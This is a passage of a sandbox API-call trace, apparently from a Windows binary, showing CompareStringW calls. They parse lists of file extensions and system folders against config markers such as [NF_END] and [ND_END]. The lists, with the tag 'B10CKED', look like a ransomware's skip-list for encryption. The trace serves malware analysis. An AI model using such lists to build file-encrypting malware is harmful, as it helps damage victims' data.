(Locale=0x400, dwCmpFlags=0x1, lpString1="DRV", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.879] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEV", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.879] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PIF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.879] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBR", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.879] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.879] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.879] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LIST", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.879] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TTF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.879] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.879] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JA", cchCount1=2, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.879] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="COM", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.879] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BAT", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.879] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CMD", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.879] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.879] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JS", cchCount1=2, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.879] CompareStringW 
(Locale=0x400, dwCmpFlags=0x1, lpString1="CFG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.879] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOWNLOAD", cchCount1=8, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.879] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NFO", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.879] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.879] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHK", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.879] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DMP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.879] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MUI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.879] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUN", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.879] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.879] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISW", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.879] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CAB", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.879] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EFI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSU", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.880] CompareStringW 
(Locale=0x400, dwCmpFlags=0x1, lpString1="BIN", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT_INFO", cchCount1=12, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT", cchCount1=7, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTM", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTML", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHM", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LANG", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="STYLE", cchCount1=5, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MP3", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FLAC", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OGG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WMA", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GIF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JAVA", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.880] 
CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CUR", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ANI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0099.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_END]", cchCount1=8, lpString2="[NF_END]", cchCount2=8) returned 2 [0099.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, 
lpString2="[ND_START]", cchCount2=10) returned 3 [0099.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DRV", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEV", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PIF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBR", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.881] CompareStringW (Locale=0x400, 
dwCmpFlags=0x1, lpString1="LIST", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TTF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JA", cchCount1=2, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="COM", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BAT", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CMD", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JS", cchCount1=2, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CFG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOWNLOAD", cchCount1=8, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NFO", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHK", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DMP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) 
returned 3 [0099.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MUI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUN", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISW", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CAB", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EFI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSU", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BIN", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT_INFO", cchCount1=12, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT", cchCount1=7, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTM", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, 
lpString1="HTML", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHM", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LANG", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="STYLE", cchCount1=5, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MP3", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FLAC", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OGG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WMA", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GIF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JAVA", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CUR", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ANI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_END]", cchCount1=8, lpString2="[ND_START]", cchCount2=10) returned 3 [0099.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[ND_START]", cchCount1=10, lpString2="[ND_START]", cchCount2=10) returned 2 [0099.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[ND_END]", cchCount2=8) 
returned 3 [0099.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) 
returned 3 [0099.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DRV", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEV", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PIF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBR", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LIST", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TTF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JA", cchCount1=2, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="COM", cchCount1=3, lpString2="[ND_END]", cchCount2=8) 
returned 3 [0099.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BAT", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CMD", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JS", cchCount1=2, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CFG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOWNLOAD", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NFO", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHK", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DMP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MUI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUN", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISW", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CAB", cchCount1=3, lpString2="[ND_END]", cchCount2=8) 
returned 3 [0099.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EFI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSU", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BIN", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT_INFO", cchCount1=12, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT", cchCount1=7, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTM", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTML", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHM", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LANG", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="STYLE", cchCount1=5, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MP3", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FLAC", cchCount1=4, 
lpString2="[ND_END]", cchCount2=8) returned 3 [0099.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OGG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WMA", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GIF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JAVA", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CUR", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ANI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_END]", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[ND_START]", cchCount1=10, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\WINDOWS", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\PROGRAM FILES", cchCount1=14, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\GAMES", cchCount1=6, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\APPDATA\\", cchCount1=9, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\APPLICATION DATA\\", cchCount1=18, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\LOCAL SETTINGS\\", cchCount1=16, lpString2="[ND_END]", cchCount2=8) returned 3 [0099.884] 
